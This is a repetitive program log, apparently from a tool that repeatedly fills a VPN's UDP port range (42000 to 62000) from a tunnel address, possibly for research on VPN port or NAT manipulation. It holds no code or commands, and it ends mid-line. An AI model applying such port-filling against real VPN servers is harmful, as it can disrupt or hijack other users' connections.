-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:56:05 -Starting port fill at 2020-09-06 04:57:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:57:05 -Starting port fill at 2020-09-06 04:58:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:58:06 -Starting port fill at 2020-09-06 04:59:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:59:06 -Starting port fill at 2020-09-06 05:00:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:00:05 -Starting port fill at 2020-09-06 05:01:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:01:05 -Starting port fill at 2020-09-06 05:02:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:02:05 -Starting port fill at 2020-09-06 05:03:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:03:05 -Starting port fill at 2020-09-06 05:04:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:04:05 -Starting port fill at 2020-09-06 05:05:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:05:05 -Starting port fill at 2020-09-06 05:06:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:06:05 -Starting port fill at 2020-09-06 05:07:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:07:04 -Starting port fill at 2020-09-06 05:08:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:08:04 -Starting port fill at 2020-09-06 05:09:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:09:04 -Starting port fill at 2020-09-06 05:10:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:10:04 -Starting port fill at 2020-09-06 05:11:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:11:04 -Starting port fill at 2020-09-06 05:12:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:12:05 -Starting port fill at 2020-09-06 05:13:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:13:05 -Starting port fill at 2020-09-06 05:14:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:14:04 -Starting port fill at 2020-09-06 05:15:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 05:15:07 -Starting port fill at 2020-09-06 05:16:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:16:04 -Starting port fill at 2020-09-06 05:17:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:17:05 -Starting port fill at 2020-09-06 05:18:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 05:18:07 -Starting port fill at 2020-09-06 05:19:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w 